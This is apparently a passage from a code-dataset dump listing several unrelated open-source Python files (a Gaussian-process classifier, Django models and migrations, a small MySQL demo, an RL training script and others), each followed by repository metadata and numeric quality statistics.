latent_values[i] = latent_values_dict[key]
else:
latent_values[i] = default_latent_values[i]
self.latent_values.value = latent_values
def _burn_samples(self, num_samples):
# sys.stderr.write('GPClassifer: burning %s: ' % ', '.join(self.params.keys()))
# sys.stderr.write('%04d/%04d' % (0, num_samples))
for i in xrange(num_samples):
# sys.stderr.write('\b'*9+'%04d/%04d' % (i, num_samples))
for sampler in self._samplers:
sampler.sample(self)
self.latent_values_sampler.sample(self)
self.chain_length += 1
# sys.stderr.write('\n')
def _collect_samples(self, num_samples):
# sys.stderr.write('GPClassifer: sampling %s: ' % ', '.join(self.params.keys()))
# sys.stderr.write('%04d/%04d' % (0, num_samples))
hypers_list = []
latent_values_list = []
for i in xrange(num_samples):
# sys.stderr.write('\b'*9+'%04d/%04d' % (i, num_samples))
for sampler in self._samplers:
sampler.sample(self)
self.latent_values_sampler.sample(self)
current_dict = self.to_dict()
hypers_list.append(current_dict['hypers'])
latent_values_list.append(current_dict['latent values'])
self.chain_length += 1
# sys.stderr.write('\n')
return hypers_list, latent_values_list
def _build(self):
self.params = {}
self.latent_values = None
# Build the transformer
beta_warp = BetaWarp(self.num_dims)
beta_alpha, beta_beta = beta_warp.hypers
self.params['beta_alpha'] = beta_alpha
self.params['beta_beta'] = beta_beta
transformer = Transformer(self.num_dims)
transformer.add_layer(beta_warp)
# Build the component kernels
input_kernel = Matern52(self.num_dims)
ls = input_kernel.hypers
self.params['ls'] = ls
# Now apply the transformation.
transform_kernel = TransformKernel(input_kernel, transformer)
# Add some perturbation for stability
stability_noise = Noise(self.num_dims)
# Finally make a noisy version if necessary
# In a classifier GP the notion of "noise" is really just the scale.
if self.noiseless:
self._kernel = SumKernel(transform_kernel, stability_noise)
else:
scaled_kernel = Scale(transform_kernel)
self._kernel = SumKernel(scaled_kernel, stability_noise)
amp2 = scaled_kernel.hypers
self.params['amp2'] = amp2
# Build the mean function (just a constant mean for now)
self.mean = Hyperparameter(
initial_value = 0.0,
prior = priors.Gaussian(0.0,1.0),
name = 'mean'
)
self.params['mean'] = self.mean
# Buld the latent values. Empty for now until the GP gets data.
self.latent_values = Hyperparameter(
initial_value = np.array([]),
name = 'latent values'
)
# Build the samplers
to_sample = [self.mean] if self.noiseless else [self.mean, amp2]
self._samplers.append(SliceSampler(*to_sample, compwise=False, thinning=self.thinning))
self._samplers.append(WhitenedPriorSliceSampler(ls, beta_alpha, beta_beta, compwise=True, thinning=self.thinning))
self.latent_values_sampler = EllipticalSliceSampler(self.latent_values, thinning=self.ess_thinning)
@property
def values(self):
if self.pending is None or len(self._fantasy_values_list) < self.num_states:
return self.observed_values
if self.num_fantasies == 1:
return np.append(self.latent_values.value, self._fantasy_values_list[self.state].flatten(), axis=0)
else:
return np.append(np.tile(self.latent_values.value[:,None], (1,self.num_fantasies)), self._fantasy_values_list[self.state], axis=0)
@property
def observed_values(self):
if self.latent_values is not None:
return self.latent_values.value
else:
return np.array([])
def set_state(self, state):
self.state = state
self._set_params_from_dict(self._hypers_list[state])
self._set_latent_values_from_dict(self._latent_values_list[state])
def pi(self, pred, compute_grad=False):
return super(GPClassifier, self).pi( pred, compute_grad=compute_grad,
C=self.sigmoid_inverse(self._one_minus_epsilon) )
def fit(self, inputs, counts, pending=None, hypers=None, reburn=False, fit_hypers=True):
# Set the data for the GP
self._inputs = inputs
self.counts = counts
# Reset the GP
self._reset()
# Initialize the GP with hypers if provided
if hypers:
self.from_dict(hypers)
if fit_hypers:
# Burn samples (if needed)
num_samples = self.burnin if reburn or self.chain_length < self.burnin else 0
self._burn_samples(num_samples)
# Now collect some samples
self._hypers_list, self._latent_values_list = self._collect_samples(self.mcmc_iters)
# Now we have more states
self.num_states = self.mcmc_iters
elif not self._hypers_list:
# Just use the current hypers as the only state
current_dict = self.to_dict()
self._hypers_list = [current_dict['hypers']]
self._latent_values_list = [current_dict['latent values']]
self.num_states = 1
# Set pending data and generate corresponding fantasies
if pending is not None:
self.pending = pending
self._fantasy_values_list = self._collect_fantasies(pending)
# Get caching ready
if self.caching:
self._prepare_cache()
# Set the hypers to the final state of the chain
self.set_state(len(self._hypers_list)-1)
return self.to_dict()
def log_binomial_likelihood(self, y=None):
# If no data, don't do anything
if not self.has_data:
return 0.0
if y is None:
y = self.latent_values.value
p = self.sigmoid(y)
# Note on the below: the obvious implementation would be
# return np.sum( pos*np.log(p) + neg*np.log(1-p) )
# The problem is, if pos = 0, and p=0, we will get a 0*-Inf = nan
# This messes things up. So we use the safer implementation below that ignores
# the term entirely if the counts are 0.
pos = self.counts # positive counts
neg = 1 - pos
with np.errstate(divide='ignore'): # suppress warnings about log(0)
return np.sum( pos[pos>0]*np.log(p[pos>0]) ) + np.sum( neg[neg>0]*np.log(1-p[neg>0]) )
def to_dict(self):
gp_dict = {}
gp_dict['hypers'] = {}
for name, hyper in self.params.iteritems():
gp_dict['hypers'][name] = hyper.value
# Save the latent values as a dict with keys as hashes of the data
# so that each latent value is associated with its input
# then when we load them in we know which ones are which
gp_dict['latent values'] = {str(hash(self._inputs[i].tostring())) : self.latent_values.value[i]
for i in xrange(self._inputs.shape[0])}
gp_dict['chain length'] = self.chain_length
return gp_dict
def from_dict(self, gp_dict):
self._set_params_from_dict(gp_dict['hypers'])
self._set_latent_values_from_dict(gp_dict['latent values'])
self.chain_length = gp_dict['chain length']
| 43.354582 | 142 | 0.684111 | 2,965 | 21,764 | 4.93086 | 0.245868 | 0.036115 | 0.022982 | 0.008755 | 0.160944 | 0.119562 | 0.065937 | 0.048564 | 0.024487 | 0.024487 | 0 | 0.00981 | 0.241224 | 21,764 | 501 | 143 | 43.441118 | 0.8755 | 0.53005 | 0 | 0.120603 | 0 | 0 | 0.044144 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.095477 | null | null | 0.005025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3e28f994d4f8d390af434d713b2e934cf2435a9 | 1,050 | py | Python | hknweb/exams/migrations/0019_auto_20200413_0212.py | AndrewKe/hknweb | 8b0591625ffe0b2fa1f50fec453d674a03f52a2e | [
"MIT"
] | null | null | null | hknweb/exams/migrations/0019_auto_20200413_0212.py | AndrewKe/hknweb | 8b0591625ffe0b2fa1f50fec453d674a03f52a2e | [
"MIT"
] | null | null | null | hknweb/exams/migrations/0019_auto_20200413_0212.py | AndrewKe/hknweb | 8b0591625ffe0b2fa1f50fec453d674a03f52a2e | [
"MIT"
] | null | null | null | # Generated by Django 2.2.8 on 2020-04-13 09:12
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('exams', '0018_auto_20200412_1715'),
]
operations = [
migrations.CreateModel(
name='ExamChoice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('exam_Choice', models.CharField(max_length=50)),
],
),
migrations.AlterField(
model_name='exam',
name='exam_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='exams.ExamChoice'),
),
migrations.AlterField(
model_name='exam',
name='instructor',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='exams.Instructor'),
),
migrations.DeleteModel(
name='CourseSemester',
),
]
| 30 | 114 | 0.590476 | 105 | 1,050 | 5.780952 | 0.533333 | 0.052718 | 0.069193 | 0.108731 | 0.336079 | 0.336079 | 0.214168 | 0.214168 | 0.214168 | 0.214168 | 0 | 0.043941 | 0.284762 | 1,050 | 34 | 115 | 30.882353 | 0.764314 | 0.042857 | 0 | 0.285714 | 1 | 0 | 0.125623 | 0.022931 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.178571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3e577b90c506a8bda99f5b1083dfe14aebd03c5 | 904 | py | Python | social_redirects/models.py | JoshZero87/site | c8024b805ff5ff0e16f54dce7bf05097fd2f08e0 | [
"MIT"
] | 4 | 2017-01-29T00:38:41.000Z | 2019-09-04T14:30:24.000Z | social_redirects/models.py | JoshZero87/site | c8024b805ff5ff0e16f54dce7bf05097fd2f08e0 | [
"MIT"
] | 74 | 2017-10-02T04:42:54.000Z | 2022-01-13T00:44:16.000Z | social_redirects/models.py | JoshZero87/site | c8024b805ff5ff0e16f54dce7bf05097fd2f08e0 | [
"MIT"
] | 3 | 2017-03-24T23:26:46.000Z | 2019-10-21T01:16:03.000Z | from django.contrib.sites.models import Site
from django.db import models
class Redirect(models.Model):
title = models.CharField(max_length=200)
description = models.CharField(max_length=1024, blank=True, null=True)
social_image = models.ImageField(null=True, blank=True)
old_path = models.CharField(max_length=200, db_index=True, verbose_name="Redirect From", help_text="This should be an absolute path, excluding the domain name. Example: '/events/search/'.")
new_path = models.CharField(max_length=200, blank=True, verbose_name="Redirect To", help_text="This can be either an absolute path (as above) or a full URL starting with 'http://'.")
site = models.ForeignKey(Site, models.CASCADE)
class Meta:
unique_together = (('site', 'old_path'),)
ordering = ('old_path',)
def __str__(self):
return "%s ---> %s" % (self.old_path, self.new_path)
| 45.2 | 193 | 0.710177 | 128 | 904 | 4.851563 | 0.515625 | 0.096618 | 0.115942 | 0.154589 | 0.143317 | 0.099839 | 0 | 0 | 0 | 0 | 0 | 0.017128 | 0.160398 | 904 | 19 | 194 | 47.578947 | 0.801054 | 0 | 0 | 0 | 0 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.142857 | 0.071429 | 0.857143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d3e9f7de3f63d7f3de57a5c2272c7c0ae564d742 | 932 | py | Python | cloud/db/db.py | bother3000/Smart-IoT-Planting-System | 7c33f150850fb8c9bc250fa02bf306f02f7cafb8 | [
"MIT"
] | 171 | 2017-09-22T08:25:18.000Z | 2022-02-28T07:56:41.000Z | cloud/db/db.py | bother3000/Smart-IoT-Planting-System | 7c33f150850fb8c9bc250fa02bf306f02f7cafb8 | [
"MIT"
] | 2 | 2018-06-28T02:33:04.000Z | 2021-06-09T06:56:58.000Z | cloud/db/db.py | bother3000/Smart-IoT-Planting-System | 7c33f150850fb8c9bc250fa02bf306f02f7cafb8 | [
"MIT"
] | 108 | 2017-10-03T20:11:52.000Z | 2022-03-19T15:21:48.000Z | #!/usr/bin/env python
import pymysql #Python3
db = pymysql.connect("localhost","sips","root","zaijian" )
cursor = db.cursor()
cursor.execute("SELECT VERSION()")
data = cursor.fetchone()
print ("Database version : %s " % data)
db.close()
def create_table():
db = pymysql.connect("localhost","sips","root","zaijian" )
cursor = db.cursor()
cursor.execute("DROP TABLE IF EXISTS EMPLOYEE")
sql = """CREATE TABLE EMPLOYEE (
FIRST_NAME CHAR(20) NOT NULL,
LAST_NAME CHAR(20),
AGE INT,
SEX CHAR(1),
INCOME FLOAT )"""
cursor.execute(sql)
db.close()
def db_insert():
db = pymysql.connect("localhost","sips","root","zaijian" )
cursor = db.cursor()
sql = """INSERT INTO EMPLOYEE(FIRST_NAME,
LAST_NAME, AGE, SEX, INCOME)
VALUES ('Mac', 'Mohan', 20, 'M', 2000)"""
try:
cursor.execute(sql)
db.commit()
except:
db.rollback()
db.close()
| 23.897436 | 60 | 0.610515 | 118 | 932 | 4.771186 | 0.466102 | 0.092362 | 0.085258 | 0.133215 | 0.333925 | 0.333925 | 0.333925 | 0.333925 | 0.333925 | 0.333925 | 0 | 0.016484 | 0.218884 | 932 | 38 | 61 | 24.526316 | 0.756868 | 0.02897 | 0 | 0.354839 | 0 | 0 | 0.460687 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.032258 | null | null | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3ebad071ed8577b67556835d306ad97a7a130ad | 217 | py | Python | algoritmos/ajuste-curvas/caso-linear/Teste.py | mauriciomoccelin/metodos-numericos | 67bdb305d4db8a59943a17128ba2c06fefcc4a36 | [
"MIT"
] | 3 | 2019-07-03T18:05:44.000Z | 2020-02-04T16:37:21.000Z | algoritmos/ajuste-curvas/caso-linear/Teste.py | mauriciomoccelin/metodos-numericos | 67bdb305d4db8a59943a17128ba2c06fefcc4a36 | [
"MIT"
] | null | null | null | algoritmos/ajuste-curvas/caso-linear/Teste.py | mauriciomoccelin/metodos-numericos | 67bdb305d4db8a59943a17128ba2c06fefcc4a36 | [
"MIT"
] | null | null | null | from RegressaoLinear import RegressaoLinear
planoCartesiano = {
0.5: 4.4,
2.8: 1.8,
4.2: 1.0,
6.7: 0.4,
8.3: 0.2
}
regressaoLinear = RegressaoLinear(planoCartesiano)
print(regressaoLinear.gerar_equacao())
| 16.692308 | 50 | 0.705069 | 32 | 217 | 4.75 | 0.5 | 0.394737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10929 | 0.156682 | 217 | 12 | 51 | 18.083333 | 0.721311 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0.1 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3f026b7191d98da19a4514bcacdc0c4c65fbbab | 433 | py | Python | UDEMY-Learn Python Programming Masterclass/Section 3-Stepping into the World of Python/exercise4.py | Sanjay9921/Python | 05ac161dd46f9b4731a5c14ff5ef52adb705e8e6 | [
"MIT"
] | null | null | null | UDEMY-Learn Python Programming Masterclass/Section 3-Stepping into the World of Python/exercise4.py | Sanjay9921/Python | 05ac161dd46f9b4731a5c14ff5ef52adb705e8e6 | [
"MIT"
] | null | null | null | UDEMY-Learn Python Programming Masterclass/Section 3-Stepping into the World of Python/exercise4.py | Sanjay9921/Python | 05ac161dd46f9b4731a5c14ff5ef52adb705e8e6 | [
"MIT"
] | null | null | null | #Integer division
#You have a shop selling buns for $2.40 each. A customer comes in with $15, and would like to buy as many buns as possible.
#Complete the code to calculate how many buns the customer can afford.
#Note: Your customer won't be happy if you try to sell them part of a bun.
#Print only the result, any other text in the output will cause the checker to fail.
bun_price = 2.40
money = 15
print( money // bun_price ) | 36.083333 | 124 | 0.745958 | 83 | 433 | 3.86747 | 0.698795 | 0.018692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028818 | 0.198614 | 433 | 12 | 125 | 36.083333 | 0.896254 | 0.840647 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
310233a1e9f02803dc17a9f40655a8b55df02a4a | 1,657 | py | Python | weeklypedia/publish.py | Nintendofan885/weeklypedia | 512be3814a693d7ba3044bda7965e7a5d3d137fd | [
"Unlicense"
] | null | null | null | weeklypedia/publish.py | Nintendofan885/weeklypedia | 512be3814a693d7ba3044bda7965e7a5d3d137fd | [
"Unlicense"
] | null | null | null | weeklypedia/publish.py | Nintendofan885/weeklypedia | 512be3814a693d7ba3044bda7965e7a5d3d137fd | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
import os
import json
from os.path import dirname
from argparse import ArgumentParser
from clastic.render import AshesRenderFactory
from common import DEBUG, DEBUG_LIST_ID, SENDKEY
from web import (comma_int,
ISSUE_TEMPLATES_PATH)
from bake import (Issue,
bake_latest_issue,
render_index,
SUPPORTED_LANGS)
_CUR_PATH = dirname(os.path.abspath(__file__))
LIST_ID_MAP = json.load(open(os.path.join(_CUR_PATH, 'secrets.json'))).get('list_ids')
def send_issue(lang, is_dev=False):
if is_dev:
list_id = DEBUG_LIST_ID
else:
list_id = LIST_ID_MAP[lang]
cur_issue = Issue(lang, include_dev=is_dev)
return cur_issue.send(list_id, SENDKEY)
def get_argparser():
desc = 'Bake and send Weeklypedia issues. (Please fetch first)'
prs = ArgumentParser(description=desc)
prs.add_argument('--lang', default=None)
prs.add_argument('--bake_all', default=False, action='store_true')
prs.add_argument('--debug', default=DEBUG, action='store_true')
return prs
if __name__ == '__main__':
issue_ashes_env = AshesRenderFactory(ISSUE_TEMPLATES_PATH,
filters={'ci': comma_int}).env
parser = get_argparser()
args = parser.parse_args()
debug = args.debug
if args.bake_all:
for lang in SUPPORTED_LANGS:
bake_latest_issue(issue_ashes_env, lang=lang, include_dev=debug)
if args.lang in SUPPORTED_LANGS:
lang = args.lang
print bake_latest_issue(issue_ashes_env, lang=lang, include_dev=debug)
print send_issue(lang, debug)
| 31.264151 | 86 | 0.674713 | 222 | 1,657 | 4.720721 | 0.355856 | 0.040076 | 0.042939 | 0.038168 | 0.097328 | 0.097328 | 0.097328 | 0.097328 | 0.097328 | 0.097328 | 0 | 0.000781 | 0.22752 | 1,657 | 52 | 87 | 31.865385 | 0.817969 | 0.012674 | 0 | 0 | 0 | 0 | 0.077723 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.195122 | null | null | 0.04878 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
310c8eff631db50cd8a05c87d1793446b7ad450c | 4,065 | py | Python | examples/fixed_play.py | wwxFromTju/malib | 7cd2a4af55cf1f56da8854e26ea7a4f3782ceea2 | [
"MIT"
] | 6 | 2021-05-19T10:25:36.000Z | 2021-12-27T03:30:33.000Z | examples/fixed_play.py | wwxFromTju/malib | 7cd2a4af55cf1f56da8854e26ea7a4f3782ceea2 | [
"MIT"
] | 1 | 2021-05-29T04:51:37.000Z | 2021-05-30T06:18:10.000Z | examples/fixed_play.py | ying-wen/malib_deprecated | 875338b81c4d87064ad31201f461ef742db05f25 | [
"MIT"
] | 1 | 2021-05-31T16:16:12.000Z | 2021-05-31T16:16:12.000Z | # Created by yingwen at 2019-03-16
from multiprocessing import Process
from malib.agents.agent_factory import *
from malib.environments import DifferentialGame
from malib.logger.utils import set_logger
from malib.samplers.sampler import MASampler
from malib.trainers import MATrainer
from malib.utils.random import set_seed
def get_agent_by_type(type_name, i, env, hidden_layer_sizes, max_replay_buffer_size):
if type_name == "SAC":
return get_sac_agent(
env,
hidden_layer_sizes=hidden_layer_sizes,
max_replay_buffer_size=max_replay_buffer_size,
)
elif type_name == "ROMMEO":
return get_rommeo_agent(
env,
agent_id=i,
hidden_layer_sizes=hidden_layer_sizes,
max_replay_buffer_size=max_replay_buffer_size,
)
elif type_name == "ROMMEO-UNI":
return get_rommeo_agent(
env,
agent_id=i,
hidden_layer_sizes=hidden_layer_sizes,
max_replay_buffer_size=max_replay_buffer_size,
uniform=True,
)
elif type_name == "DDPG-OM":
return get_ddpgom_agent(
env,
agent_id=i,
hidden_layer_sizes=hidden_layer_sizes,
max_replay_buffer_size=max_replay_buffer_size,
)
elif type_name == "DDPG-TOM":
return get_ddpgtom_agent(
env,
agent_id=i,
hidden_layer_sizes=hidden_layer_sizes,
max_replay_buffer_size=max_replay_buffer_size,
)
elif type_name == "DDPG":
return get_ddpg_agent(
env,
agent_id=i,
hidden_layer_sizes=hidden_layer_sizes,
max_replay_buffer_size=max_replay_buffer_size,
)
elif type_name == "MADDPG":
return get_maddpg_agent(
env,
agent_id=i,
hidden_layer_sizes=hidden_layer_sizes,
max_replay_buffer_size=max_replay_buffer_size,
)
elif type_name == "MFAC":
return get_maddpg_agent(
env,
agent_id=i,
hidden_layer_sizes=hidden_layer_sizes,
max_replay_buffer_size=max_replay_buffer_size,
)
def train_fixed(seed, agent_setting, game_name="ma_softq"):
set_seed(seed)
suffix = f"fixed_play1/{game_name}/{agent_setting}/{seed}"
set_logger(suffix)
batch_size = 512
training_steps = 2000
exploration_steps = 100
max_replay_buffer_size = 1e5
hidden_layer_sizes = (128, 128)
max_path_length = 1
agent_num = 2
env = DifferentialGame(game_name, agent_num)
agents = []
agent_types = agent_setting.split("_")
assert len(agent_types) == agent_num
for i, agent_type in enumerate(agent_types):
agents.append(
get_agent_by_type(
agent_type,
i,
env,
hidden_layer_sizes=hidden_layer_sizes,
max_replay_buffer_size=max_replay_buffer_size,
)
)
sampler = MASampler(
agent_num, batch_size=batch_size, max_path_length=max_path_length
)
sampler.initialize(env, agents)
trainer = MATrainer(
env=env,
agents=agents,
sampler=sampler,
steps=training_steps,
exploration_steps=exploration_steps,
training_interval=1,
extra_experiences=["annealing", "recent_experiences"],
batch_size=batch_size,
)
trainer.run()
def main():
settings = [
"ROMMEO_ROMMEO",
]
game = "ma_softq"
for setting in settings:
processes = []
for e in range(1):
seed = 1 + int(23122134 / (e + 1))
def train_func():
train_fixed(seed, setting, game)
# # # Awkward hacky process runs, because Tensorflow does not like
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
for p in processes:
p.join()
if __name__ == "__main__":
main()
| 28.229167 | 85 | 0.613284 | 484 | 4,065 | 4.75 | 0.241736 | 0.095694 | 0.139191 | 0.165289 | 0.408873 | 0.406699 | 0.406699 | 0.391475 | 0.391475 | 0.391475 | 0 | 0.014648 | 0.311439 | 4,065 | 143 | 86 | 28.426573 | 0.806717 | 0.023862 | 0 | 0.311475 | 0 | 0 | 0.040121 | 0.011607 | 0 | 0 | 0 | 0 | 0.008197 | 1 | 0.032787 | false | 0 | 0.057377 | 0 | 0.155738 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
310e8a0bf4712762b03a5c5b70b449b48e5c9b02 | 776 | py | Python | hypha/apply/projects/templatetags/payment_request_tools.py | maxpearl/hypha | e181ebadfb744aab34617bb766e746368d6f2de0 | [
"BSD-3-Clause"
] | 16 | 2020-01-24T11:52:46.000Z | 2021-02-02T22:21:04.000Z | hypha/apply/projects/templatetags/payment_request_tools.py | maxpearl/hypha | e181ebadfb744aab34617bb766e746368d6f2de0 | [
"BSD-3-Clause"
] | 538 | 2020-01-24T08:27:13.000Z | 2021-04-05T07:15:01.000Z | hypha/apply/projects/templatetags/payment_request_tools.py | maxpearl/hypha | e181ebadfb744aab34617bb766e746368d6f2de0 | [
"BSD-3-Clause"
] | 17 | 2020-02-07T14:55:54.000Z | 2021-04-04T19:32:38.000Z | import decimal
from django import template
register = template.Library()
@register.simple_tag
def can_change_status(payment_request, user):
return payment_request.can_user_change_status(user)
@register.simple_tag
def can_delete(payment_request, user):
return payment_request.can_user_delete(user)
@register.simple_tag
def can_edit(payment_request, user):
return payment_request.can_user_edit(user)
@register.simple_tag
def percentage(value, total):
if not total:
return decimal.Decimal(0)
unrounded_total = (value / total) * 100
# round using Decimal since we're dealing with currency
rounded_total = unrounded_total.quantize(
decimal.Decimal('0.0'),
rounding=decimal.ROUND_DOWN,
)
return rounded_total
| 20.972973 | 59 | 0.748711 | 103 | 776 | 5.38835 | 0.378641 | 0.151351 | 0.122523 | 0.144144 | 0.425225 | 0.340541 | 0.243243 | 0.243243 | 0 | 0 | 0 | 0.009331 | 0.171392 | 776 | 36 | 60 | 21.555556 | 0.85381 | 0.068299 | 0 | 0.181818 | 0 | 0 | 0.004161 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0.136364 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
311249ddd416775b05d1978d206331804a252949 | 3,016 | py | Python | arguments.py | nudles/a2c | 6225845ab450b5ea03b6a066455b0446d3f92ed0 | [
"MIT"
] | null | null | null | arguments.py | nudles/a2c | 6225845ab450b5ea03b6a066455b0446d3f92ed0 | [
"MIT"
] | 4 | 2021-03-19T03:19:18.000Z | 2022-01-13T01:35:04.000Z | arguments.py | nudles/a2c | 6225845ab450b5ea03b6a066455b0446d3f92ed0 | [
"MIT"
] | null | null | null | import argparse
import torch
def get_args():
parser = argparse.ArgumentParser(description='RL')
parser.add_argument('--algo', default='a2c',
help='algorithm to use: a2c | ppo ')
parser.add_argument('--lr', type=float, default=7e-5,
help='learning rate (default: 7e-4)')
parser.add_argument('--eps', type=float, default=1e-5,
help='RMSprop optimizer epsilon (default: 1e-5)')
parser.add_argument('--alpha', type=float, default=0.99,
help='RMSprop optimizer apha (default: 0.99)')
parser.add_argument('--gamma', type=float, default=0.99,
help='discount factor for rewards (default: 0.99)')
parser.add_argument('--max-grad-norm', type=float, default=0.5,
help='max norm off gradients (default: 0.5)')
parser.add_argument('--seed', type=int, default=1,
help='random seed (default: 1)')
parser.add_argument('--num-processes', type=int, default=1,
help='how many training CPU processes to use (default: 16)')
parser.add_argument('--num-steps', type=int, default=32,
help='number of forward steps in A2C (default: 5)')
parser.add_argument('--clip-param', type=float, default=0.2,
help='clip parameter (default: 0.2)')
parser.add_argument('--log-interval', type=int, default=50,
help='log interval, one log per n updates (default: 10)')
parser.add_argument('--num-frames', type=int, default=80000,
help='number of frames to train (default: 10e6)')
parser.add_argument('--cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--obs_size', type=int, default=200,
help='observation vector size')
parser.add_argument('--cycle_len', type=int, default=500,
help='observation vector size')
parser.add_argument('--debug', action='store_true', default=False,
help='whether to record the logfile')
parser.add_argument('--num_models', type=int, default=3,
help='number of the model to use')
parser.add_argument('--beta', type=float, default=1,
help='balance the accuracy and latency when calculate the reward')
parser.add_argument('--tau', type=float, default=2,
help='max waiting time for enqueue')
parser.add_argument('--max_latency', type=float, default=16,
help='accept latency for each request')
parser.add_argument('--policy', choices=['async', 'sync'], default='async', help='policy')
args = parser.parse_args()
print("cuda: %s" % str(args.cuda))
if args.cuda:
assert torch.cuda.is_available(), 'CUDA is not available in this machine!'
return args
if __name__ == '__main__':
get_args() | 52 | 94 | 0.590186 | 369 | 3,016 | 4.718157 | 0.365854 | 0.108558 | 0.205055 | 0.039058 | 0.163125 | 0.141298 | 0.048248 | 0 | 0 | 0 | 0 | 0.028131 | 0.269231 | 3,016 | 58 | 95 | 52 | 0.761797 | 0 | 0 | 0.038462 | 0 | 0 | 0.326483 | 0 | 0 | 0 | 0 | 0 | 0.019231 | 1 | 0.019231 | false | 0 | 0.038462 | 0 | 0.076923 | 0.019231 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3117a458a92a3f74cb40891238fd7657a360b0d8 | 207 | py | Python | tests/test_backup.py | KonstantinPankratov/Backupy | bfbbc97242bbf3c16da5454b5ff8741bfafa74c0 | [
"MIT"
] | 1 | 2020-02-12T12:58:28.000Z | 2020-02-12T12:58:28.000Z | tests/test_backup.py | KonstantinPankratov/Backupy | bfbbc97242bbf3c16da5454b5ff8741bfafa74c0 | [
"MIT"
] | null | null | null | tests/test_backup.py | KonstantinPankratov/Backupy | bfbbc97242bbf3c16da5454b5ff8741bfafa74c0 | [
"MIT"
] | null | null | null | import os
from Backupy import Backupy
def test_backup():
backup = Backupy()
backup.add_directory('./')
backup.start()
assert os.path.exists(backup.filename)
os.remove(backup.filename)
